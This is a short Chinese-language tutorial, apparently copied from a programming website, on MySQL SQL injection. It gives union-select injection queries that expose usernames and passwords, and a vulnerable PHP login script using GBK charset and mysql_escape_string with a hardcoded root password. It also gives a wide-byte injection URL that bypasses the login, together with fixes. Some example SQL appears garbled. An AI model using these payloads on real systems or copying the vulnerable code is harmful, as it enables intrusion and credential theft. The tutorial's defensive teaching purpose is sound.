一
MYSQL的SQL注入已經由來已久
注入URL
對應的SQL
select * from articles where id=or = order by #…
注入的URL
對應的SQL
select * from articles where id=or = union select username password from user
這樣就可以在界面上看到用戶名和密碼了
解決方法
過濾數據
將數據用括號包含
轉義數據
二
寬字節注入也是在最近的項目中發現的問題
$conn = mysql_connect(”localhost”,”root”,”2sdfxedd”);
mysql_query(”SET NAMES ‘GBK’”);
mysql_select_db(”test”,$conn);
$user = mysql_escape_string($_GET['user']);
$pass = mysql_escape_string($_GET['pass']);
$sql = “select * from cms_user where username = ‘$user’ and password=’$pass’”;
$result = mysql_query($sql,$conn);
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$rows[] = $row;
}
?>
則通過以下注入即可:
http://www.xxx.com/login.php?user=%df’%20or%201=1%20limit%201,1%23&pass=
對應的SQL是:
select * from cms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”解決方法:就是在初始化連接和字符集之後,使用SET character_set_client=binary來設定客戶端的字符集是二進制的。TW.wInGWiT.cOM如:
mysql_query(”SET character_set_client=binary”);From:http://tw.wingwit.com/Article/program/MySQL/201311/29610.html